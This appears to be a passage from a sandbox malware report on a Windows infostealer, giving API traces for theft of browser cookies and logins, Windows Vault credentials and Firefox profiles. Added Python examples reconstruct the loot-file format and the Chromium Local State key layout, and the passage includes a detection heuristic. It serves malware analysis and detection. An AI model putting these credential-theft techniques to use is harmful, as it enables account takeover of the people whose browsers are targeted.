                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1701607978-0
                                                                                                        • Opcode ID: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                        • Instruction ID: 7088c77838419d1c8a80789f1de5bf4e6231b11464886ef515f9466b212e123f
                                                                                                        • Opcode Fuzzy Hash: ef76d64d6cf8778b5dc3921a799c46b9aee72b0b08683383b909529c2558360e
                                                                                                        • Instruction Fuzzy Hash: 49218933618B8992D3108F11E4807AAB7B8F788B84F540236EB8D43B28CF7DE559CB00
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$AppendPathlstrcpy
                                                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                                                        • API String ID: 19203174-1233151749
                                                                                                        • Opcode ID: 5ebd68a201dc03246a0378e0b7619f1cb579af44d90274066901a23859bd5563
                                                                                                        • Instruction ID: 4ae058ff155d917f5c3b2da497787f6b247454a1280649d98fca5bb6b570f038
                                                                                                        • Opcode Fuzzy Hash: 5ebd68a201dc03246a0378e0b7619f1cb579af44d90274066901a23859bd5563
                                                                                                        • Instruction Fuzzy Hash: 5E21B171618A82A5DAA0FF61D8142EEA351FB8EBD0F844131EB4D4B799DE7CE604D710
                                                                                                        APIs
                                                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF7327AFE11
                                                                                                        • lstrcatW.KERNEL32 ref: 00007FF7327AFE1E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: lstrlenW.KERNEL32 ref: 00007FF7327AFF62
                                                                                                          • Part of subcall function 00007FF7327AFF3C: lstrlenW.KERNEL32 ref: 00007FF7327AFF7E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: WideCharToMultiByte.KERNEL32 ref: 00007FF7327AFFA7
                                                                                                          • Part of subcall function 00007FF7327AFF3C: PathFileExistsA.SHLWAPI ref: 00007FF7327AFFB0
                                                                                                          • Part of subcall function 00007FF7327AFF3C: OpenFile.KERNEL32 ref: 00007FF7327AFFC9
                                                                                                          • Part of subcall function 00007FF7327AFF3C: GetFileSize.KERNEL32 ref: 00007FF7327AFFE9
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CreateFileMappingA.KERNEL32 ref: 00007FF7327B0020
                                                                                                          • Part of subcall function 00007FF7327AFF3C: MapViewOfFile.KERNEL32 ref: 00007FF7327B0041
                                                                                                          • Part of subcall function 00007FF7327AFF3C: __memcpy.DELAYIMP ref: 00007FF7327B0053
                                                                                                          • Part of subcall function 00007FF7327AFF3C: UnmapViewOfFile.KERNEL32 ref: 00007FF7327B005E
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CloseHandle.KERNEL32 ref: 00007FF7327B0067
                                                                                                          • Part of subcall function 00007FF7327AFF3C: CloseHandle.KERNEL32 ref: 00007FF7327B0070
                                                                                                          • Part of subcall function 00007FF7327AF280: __memcpy.DELAYIMP ref: 00007FF7327AF29E
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                        • String ID: APPDATA
                                                                                                        • API String ID: 2395011915-4054820676
                                                                                                        • Opcode ID: 51cede005e5ac96b491f91fff2636ad4a4e1208d626e6509ebede37ba1166343
                                                                                                        • Instruction ID: 29dc9c05b3854f2a6d1bf41bd3edcb2ca513223632ed62a118cbdac3a72f3984
                                                                                                        • Opcode Fuzzy Hash: 51cede005e5ac96b491f91fff2636ad4a4e1208d626e6509ebede37ba1166343
                                                                                                        • Instruction Fuzzy Hash: 53118E22728A82A1EB50EB10E4405EEB360FF99794FC04031EB8D87A59EFBDE509C750

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.8%
                                                                                                        Dynamic/Decrypted Code Coverage:50.5%
                                                                                                        Signature Coverage:3.2%
                                                                                                        Total number of Nodes:784
                                                                                                        Total number of Limit Nodes:75

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F3778
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3782
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F3789
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3794
                                                                                                        • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 030F383B
                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030F3870
                                                                                                        • lstrlen.KERNEL32(?,?,?,?,?), ref: 030F398B
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F399A
                                                                                                        • wsprintfA.USER32 ref: 030F39F1
                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 030F39FD
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3A21
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F3A49
                                                                                                        • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 030F3B13
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3B22
                                                                                                        • wsprintfA.USER32 ref: 030F3B79
                                                                                                        • lstrlen.KERNEL32(00000000), ref: 030F3B85
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F3BA9
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 030F3BDA
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F3C16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                        • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                                        • API String ID: 584740257-404540950
                                                                                                        • Opcode ID: a0a418b429739a899f18b34f6524f3e5fa9308bc1fdfd1c9593e1b216a2bf6f5
                                                                                                        • Instruction ID: 1f43145a1ef64fca1b4684a98e110f6f7dafb6cb918b6087005b0b75c78a49ac
                                                                                                        • Opcode Fuzzy Hash: a0a418b429739a899f18b34f6524f3e5fa9308bc1fdfd1c9593e1b216a2bf6f5
                                                                                                        • Instruction Fuzzy Hash: A0E1BF7820A341AFD719EF25C840B6FBBE9AFC9754F08496CF6858B650DB35C844CB62
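The string table of this routine (a Netscape-style format string with six `%s`, the literals `TRUE`, `FALSE` and `0`, and the `SELECT host_key,path,is_secure,name,encrypted_value FROM cookies` query) is enough to reconstruct the shape of the loot file it writes. The example below is added here and is not code from the sample or from Joe Sandbox; it assumes that the report's `%sTRUE%s%s%s%s%s` lost its tab separators in extraction and that the six fields are filled, in order, with host_key, path, is_secure rendered as TRUE/FALSE, the literal `0` as expiry, name and the decrypted value. The rows are constructed. It renders such lines, parses a cookies.txt back, and flags a file whose every row carries the sample's hard-coded flag and expiry.

```python
"""Netscape cookies.txt lines of the shape the cookie routine at 030F3717
builds with wsprintfA and lstrcat, plus a parser and a loot-file heuristic.

Added example, not code from the sample or from Joe Sandbox. Assumptions
(labelled in comments): the report's format string "%sTRUE%s%s%s%s%s" lost its
tab separators in extraction, and its six %s are filled from the query
SELECT host_key,path,is_secure,name,encrypted_value FROM cookies as
host_key, path, is_secure rendered TRUE/FALSE, the literal "0" for expiry,
name, decrypted value. All rows below are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class CookieRow:
    host_key: str
    path: str
    is_secure: int   # SQLite stores the boolean as 0/1
    name: str
    value: str       # already-decrypted value; constructed here


def render_line(row: CookieRow) -> str:
    # Assumed field order: domain, include-subdomains flag (hard-coded TRUE),
    # path, secure, expiry (hard-coded "0"), name, value.
    secure = "TRUE" if row.is_secure else "FALSE"
    return "%s\tTRUE\t%s\t%s\t%s\t%s\t%s\n" % (
        row.host_key, row.path, secure, "0", row.name, row.value)


NETSCAPE_LINE = re.compile(
    r"^([^\t]+)\t(TRUE|FALSE)\t([^\t]*)\t(TRUE|FALSE)\t(\d+)\t([^\t]*)\t(.*)$")


def parse_cookies_txt(text: str) -> list:
    """Parse Netscape-format lines; comments and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        m = NETSCAPE_LINE.match(line)
        if m is None:
            continue
        rows.append({
            "domain": m.group(1),
            "flag": m.group(2),
            "path": m.group(3),
            "secure": m.group(4) == "TRUE",
            "expiry": int(m.group(5)),
            "name": m.group(6),
            "value": m.group(7),
        })
    return rows


def looks_like_stealer_dump(text: str) -> bool:
    """Heuristic for staged loot: the sample never writes a real expiry or a
    per-cookie subdomain flag, so every line carries flag TRUE and expiry 0.
    Browser and curl exports carry real expiries for persistent cookies, so a
    file where *all* rows are TRUE/0 is suspicious (a session-only jar is the
    known false positive)."""
    rows = parse_cookies_txt(text)
    return bool(rows) and all(
        r["flag"] == "TRUE" and r["expiry"] == 0 for r in rows)
```

The heuristic is deliberately conservative: a single persistent cookie with a real expiry is enough to clear a file, so use it to triage temp-directory and exfil artefacts rather than as a sole verdict.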

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the Windows Vault routine 030F2198-030F24A3, rendered as an image in the report; executed/not-executed block colouring is not recoverable from the text. Recoverable call sequence: RtlZeroMemory of a 0x114-byte structure and GetVersionExW, LoadLibraryW("vaultcli.dll"), GetProcAddress for VaultOpenVault, VaultCloseVault, VaultEnumerateItems, VaultGetItem and VaultFree, two 16-byte RtlCompareMemory checks against the constant at 03151110 (a GUID-sized compare, consistent with selecting a particular vault schema), string building via 030F1953, StrStrIW for "Internet Explorer", and FreeLibrary. Querying the OS version before using VaultGetItem is consistent with that export's prototype differing between Windows 7 and Windows 8 and later.]
                                                                                                        APIs
                                                                                                        • RtlZeroMemory.NTDLL(?,00000114), ref: 030F21AF
                                                                                                        • GetVersionExW.KERNEL32(?), ref: 030F21BE
                                                                                                        • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 030F21E8
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 030F220A
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 030F2214
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 030F2220
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 030F222A
                                                                                                        • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 030F2236
                                                                                                        • RtlCompareMemory.NTDLL(?,03151110,00000010), ref: 030F22E8
                                                                                                        • RtlCompareMemory.NTDLL(?,03151110,00000010), ref: 030F236C
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 030F23FE
                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 030F2493
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                                        • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                        • API String ID: 2583887280-2831467701
                                                                                                        • Opcode ID: 0ddb32425ae848bb713f758caa231796d7e888866b710679159cbee468ff7c98
                                                                                                        • Instruction ID: 7dcb4dece70b4824222f4149cbf5e0a6bcb11a060615cfd4a2b55a90a2a870ff
                                                                                                        • Opcode Fuzzy Hash: 0ddb32425ae848bb713f758caa231796d7e888866b710679159cbee468ff7c98
                                                                                                        • Instruction Fuzzy Hash: B091C075A093009FD718DF65C884A6FBBE9BFC8704F04482DF6959B651DBB0E841CB52

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 261 30f3098-30f30b1 call 30f1b6a 264 30f33ba-30f33c0 261->264 265 30f30b7-30f30cd 261->265 266 30f30cf-30f30d8 call 30f302d 265->266 267 30f30e3-30f3128 call 30f1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 3144bec 265->267 271 30f30dd-30f30df 266->271 274 30f312e-30f3146 call 312eeb8 267->274 275 30f339b-30f33a4 DeleteFileW call 30f1011 267->275 271->267 280 30f314c-30f3158 call 31102ec 274->280 281 30f3392-30f3396 call 3143848 274->281 279 30f33a9-30f33ab 275->279 279->264 282 30f33ad-30f33b5 call 30f2ffa 279->282 287 30f315e-30f3161 280->287 288 30f3389-30f338d call 310fb92 280->288 281->275 282->264 290 30f3165-30f317f call 30f1fa7 287->290 288->281 293 30f336f-30f337b call 31102ec 290->293 294 30f3185-30f3196 290->294 293->290 302 30f3381-30f3385 293->302 296 30f32cd-30f32e7 CryptUnprotectData 294->296 297 30f319c-30f31ac RtlCompareMemory 294->297 296->293 300 30f32ed-30f32f2 296->300 297->296 298 30f31b2-30f31b4 297->298 298->296 301 30f31ba-30f31bf 298->301 300->293 303 30f32f4-30f330a call 30f1fa7 300->303 301->296 305 30f31c5-30f31ca 301->305 302->288 308 30f330c-30f3312 303->308 309 30f3318-30f332f call 30f1fa7 303->309 305->296 307 30f31d0-30f3253 RtlZeroMemory call 30f1000 305->307 319 30f32bd 307->319 320 30f3255-30f326b call 30f1fa7 307->320 308->309 311 30f3314 308->311 315 30f333d-30f3343 309->315 316 30f3331-30f3337 309->316 311->309 321 30f3345-30f334b 315->321 322 30f3351-30f336a call 30f1798 * 3 315->322 316->315 318 30f3339 316->318 318->315 324 30f32c1-30f32c8 call 30f1011 319->324 330 30f326d-30f3273 320->330 331 30f3279-30f328e call 30f1fa7 320->331 321->322 325 30f334d 321->325 322->293 324->293 325->322 330->331 335 30f3275 330->335 339 30f329c-30f32bb call 30f1798 * 3 331->339 340 30f3290-30f3296 331->340 335->331 339->324 340->339 341 30f3298 340->341 341->339
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,030F2893,00000000,00000000,00000000,?), ref: 030F1B82
                                                                                                          • Part of subcall function 030F1B6A: CloseHandle.KERNELBASE(00000000), ref: 030F1B8F
                                                                                                        • GetTempPathW.KERNEL32(00000104,00000000), ref: 030F30F9
                                                                                                        • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 030F3103
                                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 030F310A
                                                                                                        • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 030F3115
                                                                                                        • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 030F31A4
                                                                                                        • RtlZeroMemory.NTDLL(?,00000040), ref: 030F31D7
                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 030F32DF
                                                                                                        • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 030F339C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                                        • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                                        • API String ID: 2757140130-4052020286
                                                                                                        • Opcode ID: 39819c3df31a0a5d30d195c2e0639cd45cdcc877577f6f9b12e4b269cb99a010
                                                                                                        • Instruction ID: c5636fd87ce23dcd9638210e018099b4661c6ef0a002721e08fcf36b02236600
                                                                                                        • Opcode Fuzzy Hash: 39819c3df31a0a5d30d195c2e0639cd45cdcc877577f6f9b12e4b269cb99a010
                                                                                                        • Instruction Fuzzy Hash: F891BC7920A341AFD754DF25C840E6FBBE9AFC9764F08092CF6859B650DB35D844CB22
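The login routine above and the cookie routine before it share one decision: a 3-byte RtlCompareMemory on each `encrypted_value` / `password_value`, with CryptUnprotectData only on the branch where the compare fails. The example below is added here and is not code from the sample; it assumes that compare is Chromium's `v10` prefix test, that values without the prefix are raw DPAPI blobs, and that the `os_crypt.encrypted_key` in the `Local State` file the report's directory walker looks for is base64 of `DPAPI` followed by a DPAPI blob. It classifies a value into the branch the stealer has to take and validates the Local State key layout; all blobs are constructed and nothing is decrypted, so it runs on any OS.

```python
"""Classify the encrypted values the Chromium routines at 030F3098 (logins)
and 030F3717 (cookies) read, and validate the os_crypt.encrypted_key taken
from "Local State", into the branch a DPAPI-based stealer has to take.

Added example, not code from the sample. Assumptions (labelled in comments):
the 3-byte RtlCompareMemory against "v1" in the report is Chromium's "v10"
prefix test; a value without the prefix is a raw DPAPI blob passed straight
to CryptUnprotectData; the Local State key is base64 of "DPAPI" followed by a
DPAPI blob, which must itself be unprotected before v10 values can be
decrypted. The blobs and the Local State document below are constructed
(no real key material) and nothing is decrypted.
"""
import base64
import json
from dataclasses import dataclass
from typing import Optional

# DPAPI blob header: dwVersion=1 followed by the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian field order.
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
V10_PREFIX = b"v10"   # assumed meaning of the report's "v1" + 3-byte compare
GCM_NONCE_LEN, GCM_TAG_LEN = 12, 16


@dataclass(frozen=True)
class Classified:
    scheme: str                  # "aes-gcm-v10", "dpapi" or "unknown"
    nonce: Optional[bytes]       # v10 only
    ciphertext: Optional[bytes]
    tag: Optional[bytes]         # v10 only


def classify_blob(blob: bytes) -> Classified:
    """Mirror the branch the sample takes: prefix match -> AES-GCM layout keyed
    by the Local State key; no match -> hand the whole blob to DPAPI."""
    if blob.startswith(V10_PREFIX):
        body = blob[len(V10_PREFIX):]
        if len(body) < GCM_NONCE_LEN + GCM_TAG_LEN:
            # Truncated value: refuse rather than slicing past the end.
            return Classified("unknown", None, None, None)
        return Classified("aes-gcm-v10", body[:GCM_NONCE_LEN],
                          body[GCM_NONCE_LEN:-GCM_TAG_LEN], body[-GCM_TAG_LEN:])
    if blob.startswith(DPAPI_BLOB_MAGIC):
        return Classified("dpapi", None, blob, None)
    return Classified("unknown", None, None, None)


def master_key_blob(local_state_text: str) -> bytes:
    """Strip the "DPAPI" prefix from os_crypt.encrypted_key, return the DPAPI blob."""
    doc = json.loads(local_state_text)
    raw = base64.b64decode(doc["os_crypt"]["encrypted_key"])
    if not raw.startswith(b"DPAPI"):
        raise ValueError("encrypted_key does not carry the DPAPI prefix")
    blob = raw[len(b"DPAPI"):]
    if not blob.startswith(DPAPI_BLOB_MAGIC):
        raise ValueError("encrypted_key payload is not a DPAPI blob")
    return blob


# Constructed samples (no real secrets): a v10 value, a legacy DPAPI value
# and a minimal Local State document.
SAMPLE_V10 = V10_PREFIX + bytes(range(12)) + b"CTXT" + b"\xaa" * 16
SAMPLE_DPAPI = DPAPI_BLOB_MAGIC + b"\x00" * 8
SAMPLE_KEY_BLOB = DPAPI_BLOB_MAGIC + b"\x11" * 4
SAMPLE_LOCAL_STATE = json.dumps({"os_crypt": {
    "encrypted_key": base64.b64encode(b"DPAPI" + SAMPLE_KEY_BLOB).decode()}})
```

For an analyst the useful output is the scheme label: a database full of `dpapi` values can only be read by the logged-on user's DPAPI context, while `aes-gcm-v10` values additionally need the unprotected Local State key, which is why the sample walks the profile tree for `Local State` before touching `Login Data` or `Cookies`.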

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1000: GetProcessHeap.KERNEL32(00000008,?,030F11C7,?,?,00000001,00000000,?), ref: 030F1003
                                                                                                          • Part of subcall function 030F1000: RtlAllocateHeap.NTDLL(00000000), ref: 030F100A
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030F3F0A
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 030F3F16
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F3F38
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F3F4C
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 030F3F69
                                                                                                        • lstrcmpiW.KERNEL32(?,Local State), ref: 030F3F7E
                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 030F3F9B
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F3FB5
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F3FC4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                                        • String ID: *.*$Local State
                                                                                                        • API String ID: 3923353463-3324723383
                                                                                                        • Opcode ID: 26ca958ab3cdfd5bdfe2d8d26e13d22cd6ae942289f3232b1e6b715495e87104
                                                                                                        • Instruction ID: aba31cc096de400a9f164d05806f18d269fa9f91398f37a456de0558ace6551a
                                                                                                        • Opcode Fuzzy Hash: 26ca958ab3cdfd5bdfe2d8d26e13d22cd6ae942289f3232b1e6b715495e87104
                                                                                                        • Instruction Fuzzy Hash: 9921F278201344BFD758FA309C08E7FB6BCDFCA66AF080569FA12C6585DBB9844C8671

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,03146564,?,?,030F2F0C), ref: 030F1994
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 030F2B3D
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F2B63
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F2B7B
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • StrStrIW.SHLWAPI(00000000,logins.json), ref: 030F2BE7
                                                                                                        • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 030F2C16
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F2C43
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F2C52
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                                        • String ID: \*.*$cookies.sqlite$logins.json
                                                                                                        • API String ID: 1108783765-3717368146
                                                                                                        • Opcode ID: 2bdcdfbb740b834599a4aec375beb7696e182549ae974e65f8f439b0ee0ac010
                                                                                                        • Instruction ID: 50c27574a629244e1d5ba0866b8b50d0b07c75a953a7d949338640d23efaa7de
                                                                                                        • Opcode Fuzzy Hash: 2bdcdfbb740b834599a4aec375beb7696e182549ae974e65f8f439b0ee0ac010
                                                                                                        • Instruction Fuzzy Hash: 0B31C43C3063059FCB18FB71984497E73DEABC9704B084D2CEA46DBA45EB79CD4682A1

                                                                                                        Control-flow Graph

                                                                                                        [Control-flow graph of the recursive directory walker 030F1D4A-030F1EBE, rendered as an image in the report; executed/not-executed block colouring is not recoverable from the text. Recoverable call sequence: search path built via 030F19B4 and 030F1953, FindFirstFileW, per-entry lstrcmpiW against the two constants at 031462CC and 031462D0 (the entries skipped before recursion), recursion into 030F1D4A for directories, a name hashed in 030F1CF7 (lstrlenW, RtlComputeCrc32) and compared with lstrcmpiW, a FindNextFileW loop, and FindClose.]
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 030F19C4
                                                                                                        • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 030F1DA9
                                                                                                        • lstrcmpiW.KERNEL32(?,031462CC), ref: 030F1DCF
                                                                                                        • lstrcmpiW.KERNEL32(?,031462D0), ref: 030F1DE7
                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 030F1E62
                                                                                                          • Part of subcall function 030F1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,030F2C27), ref: 030F1D02
                                                                                                          • Part of subcall function 030F1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 030F1D0D
                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 030F1E94
                                                                                                        • FindClose.KERNELBASE(00000000), ref: 030F1EA3
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,030F2F0C), ref: 030F1973
                                                                                                          • Part of subcall function 030F1953: lstrlenW.KERNEL32(03146564,?,?,030F2F0C), ref: 030F1978
                                                                                                          • Part of subcall function 030F1953: lstrcatW.KERNEL32(00000000,?,?,?,030F2F0C), ref: 030F1990
